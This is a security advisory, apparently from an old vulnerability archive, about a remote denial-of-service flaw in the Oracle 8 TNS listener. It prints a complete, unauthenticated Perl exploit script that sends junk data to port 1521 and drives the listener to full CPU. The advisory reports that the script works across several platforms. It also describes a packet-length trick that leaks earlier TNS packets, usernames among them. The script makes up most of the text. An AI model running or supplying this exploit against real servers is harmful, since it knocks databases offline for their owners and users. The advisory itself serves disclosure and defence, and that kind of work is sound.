COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle 8

PROBLEM

    'r0ot' found following.   Attached is a little  perl-script, which
    makes TNSLSNR80.EXE consume all available cpu-time so the computer
    becomes unusable.   It works on  Oracle 8 servers  running Windows
    NT 4.0 (SP6) and  does not require any  authentication credentials
    to succeed.   This has  not been  tried on  any other  versions or
    platforms.

    #!/usr/local/bin/perl -w

    # This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
    # TNSLSNR80.EXE will consume 100% CPU...
    #
    # by r0ot@runbox.com

    use IO::Socket;

    $host="kickme";
    # enter the hostname of the oracle-server to kick

    socket(HANDLE, PF_INET, SOCK_STREAM, 6);
    connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
    HANDLE->autoflush(1);

    sleep(2);
    print HANDLE "\n";
    for ($i=0; $i<3; $i++) {
            sleep(2);
            print HANDLE "dfsdffdfsfdggfdgdf";
            # an arbitrary, but carefully chosen constant...
    }

    close(HANDLE);

    It works against Oracle 8.0.5 running on linux as well...

    Rony tested it on HPUX 11.0 and Solaris 8 running 8.0.6.  The  CPU
    jumped to 100%.  However this toke a few minutes until impact.

SOLUTION

    There were some remote DoS and general security bugs in the Oracle
    tnslsnr in (at least) 8.1.6.  This was reported to Oracle back  in
    October  2000;  8.1.7  fixes  the  DoS  and  most  of the security
    problems (TNS  'query leaking'  is still  possible in  8.1.7 -- by
    sending tnslsnr  a packet  with a  bogus length,  it's possible to
    see the contents of previous TNS packets.  While this won't reveal
    past SQL sessions, it does show usernames and other oddities.)

        http://otn.oracle.com/deploy/security/alerts.htm
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818
        http://xforce.iss.net/alerts/advise66.php
        http://www.jammed.com/~jwa/hacks/security/tnscmd/